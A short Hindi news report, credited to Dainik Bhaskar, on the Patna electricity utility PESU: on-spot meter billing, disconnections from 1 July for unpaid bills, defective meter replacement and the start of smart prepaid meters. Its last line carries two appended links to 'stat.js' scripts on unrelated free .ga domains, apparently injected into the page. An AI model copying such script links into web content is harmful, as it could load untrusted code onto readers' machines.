मंगलवार से बिजली की ऑन स्पॉट बिलिंग होगी। मीटर की रीडिंग कर ही उपभोक्ताओं को बिल दिया जाएगा। जो उपभोक्ता बिल जमा नहीं करेंगे उनकी बिजली 1 जुलाई से कटेगी। सोमवार को पेसू में आयोजित बैठक के दौरान सभी डिविजन के विद्युत कार्यपालक अभियंताओं को 100 फीसदी ऑन स्पॉट बिलिंग कराने काे कहा गया।
डिफेक्टिव मीटर की शिकायत होगी दूर
पेसू ने सभी डिविजन के विद्युत कार्यपालक अभियंताओं को अपने-अपने क्षेत्र के घरेलू बिजली उपभोक्ताओं के डिफेक्टिव मीटर बदलने का निर्देश दिया है। पेसू क्षेत्र में करीब 4000 लोगों ने कनेक्शन के लिए आवेदन दिया है। पेसू क्षेत्र में 10 जून से स्मार्ट प्रीपेड मीटर लगाने की शुरुआत होगी। बिजली कंपनी मुख्यालय के सर्वर से कम्युनिकेशन नहीं करने वाले स्मार्ट प्रीपेड मीटर की गड़बड़ियों को दूर किया जाएगा।
साभार : दैनिक भास्करhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms